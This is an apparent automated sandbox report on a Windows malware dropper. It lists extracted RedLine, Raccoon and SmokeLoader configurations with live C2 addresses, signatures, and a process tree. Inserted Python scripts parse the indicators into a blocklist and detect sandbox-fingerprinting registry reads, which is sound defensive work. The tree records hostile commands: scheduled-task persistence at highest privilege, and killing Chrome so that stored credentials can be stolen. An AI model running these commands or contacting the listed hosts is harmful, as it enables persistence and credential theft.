Analysis

max time kernel:  92s
max time network: 153s
platform:         windows10_x64
resource:         win10-en-20211014
submitted:        19/11/2021, 21:58

Static task:      static1
Behavioral task:  behavioral1
  Sample:   022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
  Resource: win7-en-20211104
Behavioral task:  behavioral2
  Sample:   022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
  Resource: win10-en-20211014

All signature hits and the process tree on this page reference behavioral2 (the win10-en-20211014 run), as the behavioral2/ prefixes in the YARA match paths show.
General

Target: 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Size:   403KB
MD5:    f957e397e71010885b67f2afe37d8161
SHA1:   a8bf84b971b37ac6e7f66c5e5a7e971a7741401e
SHA256: 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66
SHA512: 8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6
Malware Config

Extracted: socelars
  http://www.gianninidesign.com/

Extracted: redline
  555
  91.206.14.151:64591

Extracted: smokeloader
  2020
  http://membro.at/upload/
  http://jeevanpunetha.com/upload/
  http://misipu.cn/upload/
  http://zavodooo.ru/upload/
  http://targiko.ru/upload/
  http://vues3d.com/upload/

Extracted: metasploit
  windows/single_exec

Extracted: redline
  udptest
  193.56.146.64:65441

Extracted: redline
  bbbb
  37.9.13.169:63912

Extracted: raccoon
  1.8.3-hotfix
  ddf183af4241e3172885cf1b2c4c1fb4ee03d05a
  url4cnc:
    http://91.219.236.27/capibar
    http://5.181.156.92/capibar
    http://91.219.236.207/capibar
    http://185.225.19.18/capibar
    http://91.219.237.227/capibar
    https://t.me/capibar

Three separate RedLine configurations (555, udptest and bbbb), each with its own C2 socket, were extracted from this one run, so the loader drops three distinct RedLine builds. The Raccoon url4cnc list mixes five IP-hosted URLs with a Telegram profile (https://t.me/capibar); Raccoon fetches the channel page to recover its current C2, which is the "Legitimate hosting services abused" signature below. Blocking t.me outright is rarely an option, so the five IP hosts and the Telegram channel name are the usable indicators there.
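The configuration block above is the most directly actionable part of the report. The following Python script is an added example, not part of the sandbox output: it parses the block exactly as printed (the text is embedded verbatim), turns socket and URL entries into typed indicators, and builds a host blocklist that leaves the t.me dead-drop resolver out, since the real C2 is whatever the channel currently points to. The category names and the DEAD_DROP_HOSTS set are this example's own choices.

```python
import ipaddress
import re
from urllib.parse import urlparse

# The "Malware Config" block, copied verbatim from the report above.
CONFIG_TEXT = """\
Extracted
socelars
http://www.gianninidesign.com/
Extracted
redline
555
91.206.14.151:64591
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Extracted
metasploit
windows/single_exec
Extracted
redline
udptest
193.56.146.64:65441
Extracted
redline
bbbb
37.9.13.169:63912
Extracted
raccoon
1.8.3-hotfix
ddf183af4241e3172885cf1b2c4c1fb4ee03d05a
url4cnc
http://91.219.236.27/capibar
http://5.181.156.92/capibar
http://91.219.236.207/capibar
http://185.225.19.18/capibar
http://91.219.237.227/capibar
https://t.me/capibar
"""

SOCKET_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")
# Dead-drop resolvers: the page at the URL is read to obtain the real C2, so
# the host itself is legitimate.  The set is this example's own choice.
DEAD_DROP_HOSTS = {"t.me", "telegram.me"}


def parse_config(text):
    """Split the block into per-family sections and pull out network indicators.

    Returns a list of dicts with family, kind ('socket', 'url' or 'dead_drop'),
    host, port and the raw value.  Lines that are neither sockets nor URLs
    (botnet names, versions, payload names) are kept as section labels.
    """
    sections, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line == "Extracted":
            current = {"family": None, "labels": [], "indicators": []}
            sections.append(current)
            continue
        if current is None:
            continue
        if current["family"] is None:
            current["family"] = line
            continue
        m = SOCKET_RE.match(line)
        if m:
            ip, port = m.group(1), int(m.group(2))
            ipaddress.ip_address(ip)  # raises on a malformed address
            current["indicators"].append({"kind": "socket", "host": ip, "port": port, "value": line})
        elif line.startswith(("http://", "https://")):
            u = urlparse(line)
            kind = "dead_drop" if u.hostname in DEAD_DROP_HOSTS else "url"
            port = u.port or (443 if u.scheme == "https" else 80)
            current["indicators"].append({"kind": kind, "host": u.hostname, "port": port, "value": line})
        else:
            current["labels"].append(line)
    return [dict(family=s["family"], **ind) for s in sections for ind in s["indicators"]]


def blocklist(indicators):
    """Hosts that can be blocked outright (everything except dead-drop
    resolvers), each with the families that use it, sorted for a stable diff."""
    hosts = {}
    for ind in indicators:
        if ind["kind"] == "dead_drop":
            continue
        hosts.setdefault(ind["host"], set()).add(ind["family"])
    return sorted((h, sorted(f)) for h, f in hosts.items())


if __name__ == "__main__":
    inds = parse_config(CONFIG_TEXT)
    for ind in inds:
        print(f"{ind['family']:<12} {ind['kind']:<9} {ind['host']}:{ind['port']}")
    print(len(blocklist(inds)), "blockable hosts")
```

The port derived for plain URLs is the scheme default; for SmokeLoader and Socelars that is all the config carries, so a firewall rule should match on host, not host and port.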
Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload  6 IoCs
  resource                                                                       yara_rule
  behavioral2/memory/2868-263-0x0000000000400000-0x0000000000420000-memory.dmp    family_redline
  behavioral2/memory/2868-287-0x0000000000418EFE-mapping.dmp                      family_redline
  behavioral2/memory/3884-286-0x0000000000418EEE-mapping.dmp                      family_redline
  behavioral2/memory/1180-261-0x0000000002580000-0x00000000025AC000-memory.dmp    family_redline
  behavioral2/memory/3884-258-0x0000000000400000-0x0000000000420000-memory.dmp    family_redline
  behavioral2/memory/1180-235-0x00000000023D0000-0x00000000023FE000-memory.dmp    family_redline
PID 1180 is 4a_srNM9UohMmVM9bKpDSGS4.exe in the process tree. PIDs 2868 and 3884 do not appear in the tree as captured on this page; the same 0x00400000-0x00420000 region matches in both, so the same RedLine image is mapped in two processes.

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload  2 IoCs
  resource                                    yara_rule
  behavioral2/files/0x000400000001abbe-133.dat  family_socelars
  behavioral2/files/0x000400000001abbe-140.dat  family_socelars
Identifies VirtualBox via ACPI registry values (likely anti-VM)  2 TTPs

Blocklisted process makes network request  1 IoCs
  flow  pid   Process
  128   2720  cmd.exe
PID 2720 is also the PID of the top-level sample process at the start of the trace. The cmd.exe that carries this flow is the depth-10 child of the mshta.exe loader in the process tree, so the PID was reused after the original process exited; attribute the flow by process start time, not by PID alone.

Downloads MZ/PE file

Executes dropped EXE  25 IoCs
  pid   Process
  2224  LUR58T8ha0SYLkgjopFYszr1.exe
  1500  iOQgSJtYCZEln8V8xrIq3YiN.exe
  1184  c3jlwI22KyQswLqpMAZMLoNv.exe
  2584  ZtQmi64xfNHBdyzqDnGYn0w1.exe
  1236  sjP2NNGLkLXmtRLr84FTXoXx.exe
  676   sxrRrick3gD4kfxFesJBiP0k.exe
  1180  4a_srNM9UohMmVM9bKpDSGS4.exe
  2400  Rn16AjUDOEUw_Phj5cpEWNW3.exe
  3640  x_aSVw4EDPeHhdDlVBUwnD5i.exe
  1316  FvB0vwSDHiNEaiHHprj88QvP.exe
  892   jBWeyRHTi62HuqZULFmHBJZQ.exe
  1448  PeRBFnMEUcYITSFocoY9fLRF.exe
  1232  nAcUXNNobKFMoFFQJ9XOsJ52.exe
  2308  TxDbe8aS2EdqwtmMaCuHHaCv.exe
  1864  SIv0sTchmQvzTnVJQD4OBmUl.exe
  2108  jRu17kZMHmlu09jEcP7j8AiT.exe
  1968  Ns_bc3yvvzhDnhFBWNVaCAoA.exe
  1964  FgfMTZvTbi4wD01SGlMOF8MG.exe
  3896  cS1iPoHMzXj4Y6kY3A6yydrM.exe
  2208  4XXl_o0ZoNjiS8c1uCdyespF.exe
  3240  WH0lWYx3KsYqWPkVAZlF8sNH.exe
  2396  0x6o3hs3eABLDe2nznrTWCcJ.exe
  2640  uvSQkFfGlN4hF4GFY7NSg2XG.exe
  1104  inst2.exe
  3052  nAcUXNNobKFMoFFQJ9XOsJ52.exe
Checks BIOS information in registry  2 TTPs  14 IoCs
BIOS information is often read in order to detect sandboxing environments.
All 14 events are "Key value queried" on \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System; each of the seven processes below read both SystemBiosVersion and VideoBiosVersion:
  Process                        values queried
  Ns_bc3yvvzhDnhFBWNVaCAoA.exe   SystemBiosVersion, VideoBiosVersion
  SIv0sTchmQvzTnVJQD4OBmUl.exe   SystemBiosVersion, VideoBiosVersion
  0x6o3hs3eABLDe2nznrTWCcJ.exe   SystemBiosVersion, VideoBiosVersion
  4XXl_o0ZoNjiS8c1uCdyespF.exe   SystemBiosVersion, VideoBiosVersion
  FgfMTZvTbi4wD01SGlMOF8MG.exe   SystemBiosVersion, VideoBiosVersion
  cS1iPoHMzXj4Y6kY3A6yydrM.exe   SystemBiosVersion, VideoBiosVersion
  jRu17kZMHmlu09jEcP7j8AiT.exe   SystemBiosVersion, VideoBiosVersion
Checks computer location settings  2 TTPs  1 IoCs
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                     Process
  Key value queried  \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation  022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Reads user/profile data of web browsers  2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Themida packer  17 IoCs
Matches of the themida YARA rule (Themida is a commercial code protector; these are the protected dropped executables, not a malware family in themselves).
  resource                                                                     yara_rule
  behavioral2/memory/1964-237-0x0000000000D80000-0x0000000000D81000-memory.dmp  themida
  behavioral2/memory/1968-226-0x0000000001060000-0x0000000001061000-memory.dmp  themida
  behavioral2/files/0x000600000001abe9-431.dat                                 themida
  behavioral2/files/0x000600000001abe9-429.dat                                 themida
  behavioral2/memory/2396-218-0x00000000013B0000-0x00000000013B1000-memory.dmp  themida
  behavioral2/memory/2208-217-0x0000000000DB0000-0x0000000000DB1000-memory.dmp  themida
  behavioral2/files/0x000400000001abf0-444.dat                                 themida
  behavioral2/memory/3896-207-0x0000000000100000-0x0000000000101000-memory.dmp  themida
  behavioral2/files/0x000500000001abe4-181.dat                                 themida
  behavioral2/files/0x000500000001abe4-180.dat                                 themida
  behavioral2/files/0x000400000001abe0-177.dat                                 themida
  behavioral2/files/0x000400000001abe0-176.dat                                 themida
  behavioral2/files/0x000200000001abdb-175.dat                                 themida
  behavioral2/files/0x000600000001abdd-171.dat                                 themida
  behavioral2/files/0x000200000001abdb-174.dat                                 themida
  behavioral2/files/0x000700000001abcd-172.dat                                 themida
  behavioral2/files/0x000600000001abdd-170.dat                                 themida
The five PIDs with in-memory matches (1964, 1968, 2396, 2208, 3896) are exactly the five processes listed under NtSetInformationThreadHideFromDebugger below.
Checks installed software on the system  1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled  7 IoCs
Reads the EnableLUA policy value to determine whether UAC is active on the host.
  description        ioc                                                                              Process
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  4XXl_o0ZoNjiS8c1uCdyespF.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  Ns_bc3yvvzhDnhFBWNVaCAoA.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  jRu17kZMHmlu09jEcP7j8AiT.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  SIv0sTchmQvzTnVJQD4OBmUl.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  cS1iPoHMzXj4Y6kY3A6yydrM.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  FgfMTZvTbi4wD01SGlMOF8MG.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  0x6o3hs3eABLDe2nznrTWCcJ.exe
These are the same seven processes that read the BIOS version strings above.
Legitimate hosting services abused for malware hosting/C2  1 TTPs

Looks up external IP address via web service  6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  130   ipinfo.io
  131   ipinfo.io
  141   ip-api.com
  176   ipinfo.io
  34    ipinfo.io
  35    ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger  5 IoCs
  pid   Process
  2396  0x6o3hs3eABLDe2nznrTWCcJ.exe
  3896  cS1iPoHMzXj4Y6kY3A6yydrM.exe
  2208  4XXl_o0ZoNjiS8c1uCdyespF.exe
  1968  Ns_bc3yvvzhDnhFBWNVaCAoA.exe
  1964  FgfMTZvTbi4wD01SGlMOF8MG.exe
All five carry Themida in-memory matches; hiding threads from the debugger is part of the protector's anti-debug code rather than something specific to the payloads.

Suspicious use of SetThreadContext  1 IoCs
  description                               pid   Process                        procid_target
  PID 1232 set thread context of 3052       1232  nAcUXNNobKFMoFFQJ9XOsJ52.exe   94
The parent starts a second copy of its own image (PID 3052, listed under "Executes dropped EXE") and rewrites that child's thread context; the pattern is consistent with injecting an unpacked payload into a suspended child (process hollowing), so memory of 3052 rather than the file on disk is where the real code is.
Drops file in Program Files directory  7 IoCs
  description                  ioc                                                       Process
  File opened for modification  C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe    x_aSVw4EDPeHhdDlVBUwnD5i.exe
  File opened for modification  C:\Program Files (x86)\Company\NewProduct\rtst1039.exe    x_aSVw4EDPeHhdDlVBUwnD5i.exe
  File opened for modification  C:\Program Files (x86)\Company\NewProduct\Uninstall.exe   x_aSVw4EDPeHhdDlVBUwnD5i.exe
  File created                  C:\Program Files (x86)\Company\NewProduct\Uninstall.ini   x_aSVw4EDPeHhdDlVBUwnD5i.exe
  File created                  C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe  iOQgSJtYCZEln8V8xrIq3YiN.exe
  File opened for modification  C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe  iOQgSJtYCZEln8V8xrIq3YiN.exe
  File opened for modification  C:\Program Files (x86)\Company\NewProduct\inst2.exe       x_aSVw4EDPeHhdDlVBUwnD5i.exe
PowerControl_Svc.exe is the binary the two schtasks entries (HOURLY and ONLOGON, both /rl HIGHEST) point at; its dropper, iOQgSJtYCZEln8V8xrIq3YiN.exe (PID 1500), is also the parent of both schtasks.exe processes in the tree.

Drops file in Windows directory  1 IoCs
  description   ioc                                               Process
  File created  C:\Windows\AppCompat\Programs\Amcache.hve.tmp     WerFault.exe
Enumerates physical storage devices  1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
No ransomware family was identified in this run; drive enumeration is also common in stealers and in VM-detection code, so this hit should be read alongside the SCSI and BIOS checks rather than on its own.

Program crash  9 IoCs
  pid   pid_target  Process       procid_target
  1536  2584        WerFault.exe  74
  4760  2584        WerFault.exe  74
  4584  2584        WerFault.exe  74
  5008  2584        WerFault.exe  74
  4252  2584        WerFault.exe  74
  4212  2108        WerFault.exe  90
  4380  2584        WerFault.exe  74
  3320  2640        WerFault.exe  83
  4068  3240        WerFault.exe  84
ZtQmi64xfNHBdyzqDnGYn0w1.exe (2584) crashed six times; 2108 is jRu17kZMHmlu09jEcP7j8AiT.exe, one of the Themida-protected set that falls after the point where the captured process tree ends.
Checks SCSI registry key(s)  3 TTPs  3 IoCs
SCSI information is often read in order to detect sandboxing environments.
  description     ioc                                             Process
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  FvB0vwSDHiNEaiHHprj88QvP.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  FvB0vwSDHiNEaiHHprj88QvP.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  FvB0vwSDHiNEaiHHprj88QvP.exe
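The registry reads in the signatures above (BIOS version strings, the SCSI enumeration tree, Geo\Nation and EnableLUA) are individually weak signals; what makes them useful is correlating them per process. The following Python is an added example and not part of the sandbox report: it runs that correlation over a constructed list of registry events shaped like the rows in these tables (plus one made-up benign installer, PID 4242, that reads SystemBiosVersion once) and tags each process. The thresholds, tag names and the (pid, image, operation, key) tuple format are this example's own assumptions; telemetry that records registry reads varies by product.

```python
import re
from collections import defaultdict

# Registry paths the report's signatures key on.  The first two are the
# classic VM/sandbox fingerprints, the other two the geofence and UAC checks.
# Category names are this example's own.
KEY_PATTERNS = {
    "vm_bios":  re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\(System|Video)BiosVersion$", re.I),
    "vm_scsi":  re.compile(r"\\SYSTEM\\(ControlSet\d{3}|CurrentControlSet)\\Enum\\SCSI(\\|$)", re.I),
    "geofence": re.compile(r"\\Control Panel\\International\\Geo\\Nation$", re.I),
    "uac":      re.compile(r"\\Policies\\System\\EnableLUA$", re.I),
}
VM_CATEGORIES = {"vm_bios", "vm_scsi"}


def normalize_key(key):
    """Rewrite native object-manager paths into the HKLM/HKU form analysts read."""
    key = re.sub(r"^\\REGISTRY\\MACHINE", "HKLM", key, flags=re.I)
    key = re.sub(r"^\\REGISTRY\\USER\\S-1-5-21-[\d-]+", r"HKU\\<user>", key, flags=re.I)
    return key


def classify_key(key):
    for name, pattern in KEY_PATTERNS.items():
        if pattern.search(key):
            return name
    return None


def score_processes(events):
    """events: iterable of (pid, image, operation, key).  Collects per process
    the categories hit, the distinct keys touched and (category, operation)."""
    hits = defaultdict(lambda: {"categories": set(), "keys": set(), "ops": set()})
    for pid, image, operation, key in events:
        category = classify_key(key)
        if category is None:
            continue
        h = hits[(pid, image)]
        h["categories"].add(category)
        h["keys"].add(normalize_key(key))
        h["ops"].add((category, operation.lower()))
    return dict(hits)


def verdicts(events):
    """Tag each process.  Two distinct VM-fingerprint values read by one
    process, or an enumeration of the SCSI device tree (where VBOX/VMware
    device IDs show up), counts as fingerprinting; a single SystemBiosVersion
    read is common in ordinary installers and is not flagged on its own."""
    out = {}
    for (pid, image), h in score_processes(events).items():
        tags = []
        vm_keys = [k for k in h["keys"] if classify_key(k) in VM_CATEGORIES]
        if len(vm_keys) >= 2 or ("vm_scsi", "key enumerated") in h["ops"]:
            tags.append("sandbox-fingerprinting")
        if "geofence" in h["categories"]:
            tags.append("geofence-check")
        if "uac" in h["categories"]:
            tags.append("uac-check")
        if tags:
            out[(pid, image)] = sorted(tags)
    return out


# Constructed events mirroring rows from the signature tables above, plus a
# made-up benign process (PID 4242, setup.exe) that reads SystemBiosVersion once.
HKLM = r"\REGISTRY\MACHINE"
SAMPLE_EVENTS = [
    (2720, "022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe", "Key value queried",
     r"\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation"),
    (1968, "Ns_bc3yvvzhDnhFBWNVaCAoA.exe", "Key value queried", HKLM + r"\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    (1968, "Ns_bc3yvvzhDnhFBWNVaCAoA.exe", "Key value queried", HKLM + r"\HARDWARE\DESCRIPTION\System\VideoBiosVersion"),
    (1968, "Ns_bc3yvvzhDnhFBWNVaCAoA.exe", "Key value queried",
     HKLM + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"),
    (1316, "FvB0vwSDHiNEaiHHprj88QvP.exe", "Key opened", HKLM + r"\SYSTEM\ControlSet001\Enum\SCSI"),
    (1316, "FvB0vwSDHiNEaiHHprj88QvP.exe", "Key queried", HKLM + r"\SYSTEM\ControlSet001\Enum\SCSI"),
    (1316, "FvB0vwSDHiNEaiHHprj88QvP.exe", "Key enumerated", HKLM + r"\SYSTEM\ControlSet001\Enum\SCSI"),
    (4242, "setup.exe", "Key value queried", HKLM + r"\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    (4242, "setup.exe", "Key value queried", HKLM + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"),
]

if __name__ == "__main__":
    for (pid, image), tags in sorted(verdicts(SAMPLE_EVENTS).items()):
        print(pid, image, ", ".join(tags))
```

The benign installer drops out because it reads one BIOS value and nothing else; the seven Themida-protected processes in this report would all be tagged twice (fingerprinting and UAC check), which is the combination worth alerting on.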
Creates scheduled task(s)  1 TTPs  2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  4868  schtasks.exe
  4900  schtasks.exe
Both tasks (names "PowerControl HR" and "PowerControl LG", see the process tree) run C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe as "Admin" with /rl HIGHEST, one hourly and one at logon; the task names and that path are the persistence artifacts to check for on a suspected host.

Kills process with taskkill  4 IoCs
  pid   Process
  5612  taskkill.exe
  5904  taskkill.exe
  5764  taskkill.exe
  5160  taskkill.exe
Two of these (5904, 5160) are "taskkill /f /im chrome.exe", issued so that the browser's credential and cookie databases are not locked when the stealers read them; 5764 is the self-delete step of sjP2NNGLkLXmtRLr84FTXoXx.exe and 5612 removes the 4836048.exe stage of the mshta loader chain.
Suspicious behavior: EnumeratesProcesses  64 IoCs
The 64 rows shown collapse to two processes:
  pid   Process                                                                   rows
  2720  022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe     2
  2224  LUR58T8ha0SYLkgjopFYszr1.exe                                              62
Suspicious use of AdjustPrivilegeToken  40 IoCs
  PID 676  sxrRrick3gD4kfxFesJBiP0k.exe enabled, in one sweep, every privilege from LUID 2 through 35:
    SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege,
    SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
    SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
    SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege,
    SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege,
    SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege,
    SeCreateGlobalPrivilege, and the privileges the sandbox reports only by LUID: 31, 32, 33, 34, 35
    (SeTrustedCredManAccessPrivilege, SeRelabelPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege).
  PID 3320  WerFault.exe: SeRestorePrivilege, SeBackupPrivilege
  PID 4068  WerFault.exe: SeRestorePrivilege, SeBackupPrivilege, SeBackupPrivilege, SeDebugPrivilege
Enabling the whole privilege list blindly is the "enable everything" loop, not a request for a specific right; it succeeds only for privileges the token already holds, so it is a fingerprint rather than an escalation. Note that PID 676 is also assigned to Fanulukeni.exe later in the process tree, so the attribution of these 34 events is by PID and should be confirmed against process start times.
Suspicious use of WriteProcessMemory  64 IoCs
Every row is the top-level sample (PID 2720, 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe) writing into a child it has just created, two or three writes per child. Collapsed by target, in the order the rows appear:
  target PID  procid_target  writes
  2224        69             2
  1500        70             3
  1184        71             3
  2584        74             3
  1236        72             3
  2400        76             3
  1180        75             3
  676         77             3
  3640        81             3
  1316        80             3
  892         79             2
  1448        78             3
  1232        82             3
  2308        92             3
  1864        91             3
  2108        90             3
  1964        89             3
  1968        88             3
  3896        87             3
  2208        86             3
  2396        85             3
  3240        84             3
A few writes into every freshly created child is what process creation itself looks like under this kind of hook, not injection; the injection-relevant event in this run is the SetThreadContext entry (1232 into 3052). The table stops at 64 rows, the same ceiling as EnumeratesProcesses, so later writes (for example 1232's writes into 3052) may simply not be listed.
Processes
-
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Admin\Pictures\Adobe Films\LUR58T8ha0SYLkgjopFYszr1.exe"C:\Users\Admin\Pictures\Adobe Films\LUR58T8ha0SYLkgjopFYszr1.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2224
-
-
C:\Users\Admin\Pictures\Adobe Films\iOQgSJtYCZEln8V8xrIq3YiN.exe"C:\Users\Admin\Pictures\Adobe Films\iOQgSJtYCZEln8V8xrIq3YiN.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1500 -
C:\Users\Admin\Documents\AEbY8UAJWi1MpTVXKD8ohyjZ.exe"C:\Users\Admin\Documents\AEbY8UAJWi1MpTVXKD8ohyjZ.exe"3⤵PID:4840
-
C:\Users\Admin\Pictures\Adobe Films\kl3RAAS6f1tz1p8g3_dRwt1s.exe"C:\Users\Admin\Pictures\Adobe Films\kl3RAAS6f1tz1p8g3_dRwt1s.exe"4⤵PID:4492
-
-
C:\Users\Admin\Pictures\Adobe Films\pZxwNsmoJVuinHL_7isgP_W4.exe"C:\Users\Admin\Pictures\Adobe Films\pZxwNsmoJVuinHL_7isgP_W4.exe"4⤵PID:1540
-
-
C:\Users\Admin\Pictures\Adobe Films\iotJdjs4abKDV9eYu1gdEi0W.exe"C:\Users\Admin\Pictures\Adobe Films\iotJdjs4abKDV9eYu1gdEi0W.exe"4⤵PID:3176
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:5904
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IxEhVnrW48SVjvCjX7vv_cpf.exe"C:\Users\Admin\Pictures\Adobe Films\IxEhVnrW48SVjvCjX7vv_cpf.exe"4⤵PID:2412
-
-
C:\Users\Admin\Pictures\Adobe Films\m65n_w3rGTQHMRdhjZEt34AM.exe"C:\Users\Admin\Pictures\Adobe Films\m65n_w3rGTQHMRdhjZEt34AM.exe"4⤵PID:2728
-
-
C:\Users\Admin\Pictures\Adobe Films\QP5JjEmOTRwEfS1PGyZBtLEe.exe"C:\Users\Admin\Pictures\Adobe Films\QP5JjEmOTRwEfS1PGyZBtLEe.exe"4⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\is-M9F2I.tmp\QP5JjEmOTRwEfS1PGyZBtLEe.tmp"C:\Users\Admin\AppData\Local\Temp\is-M9F2I.tmp\QP5JjEmOTRwEfS1PGyZBtLEe.tmp" /SL5="$102C6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\QP5JjEmOTRwEfS1PGyZBtLEe.exe"5⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\is-V7U4T.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-V7U4T.tmp\lakazet.exe" /S /UID=27096⤵PID:5960
-
C:\Users\Admin\AppData\Local\Temp\54-c314b-afd-bc69c-0edf7316fc4d3\Fanulukeni.exe"C:\Users\Admin\AppData\Local\Temp\54-c314b-afd-bc69c-0edf7316fc4d3\Fanulukeni.exe"7⤵PID:676
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6BLHxGgQFAe5umiNXvTolJSF.exe"C:\Users\Admin\Pictures\Adobe Films\6BLHxGgQFAe5umiNXvTolJSF.exe"4⤵PID:6132
-
C:\Users\Admin\Pictures\Adobe Films\6BLHxGgQFAe5umiNXvTolJSF.exe"C:\Users\Admin\Pictures\Adobe Films\6BLHxGgQFAe5umiNXvTolJSF.exe" -u5⤵PID:3808
-
-
-
C:\Users\Admin\Pictures\Adobe Films\T83J5ZnzUDjn4_QClZDSO1Jv.exe"C:\Users\Admin\Pictures\Adobe Films\T83J5ZnzUDjn4_QClZDSO1Jv.exe"4⤵PID:6048
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4900
-
-
-
C:\Users\Admin\Pictures\Adobe Films\c3jlwI22KyQswLqpMAZMLoNv.exe"C:\Users\Admin\Pictures\Adobe Films\c3jlwI22KyQswLqpMAZMLoNv.exe"2⤵
- Executes dropped EXE
PID:1184 -
C:\Users\Admin\Pictures\Adobe Films\c3jlwI22KyQswLqpMAZMLoNv.exe"C:\Users\Admin\Pictures\Adobe Films\c3jlwI22KyQswLqpMAZMLoNv.exe"3⤵PID:4464
-
-
-
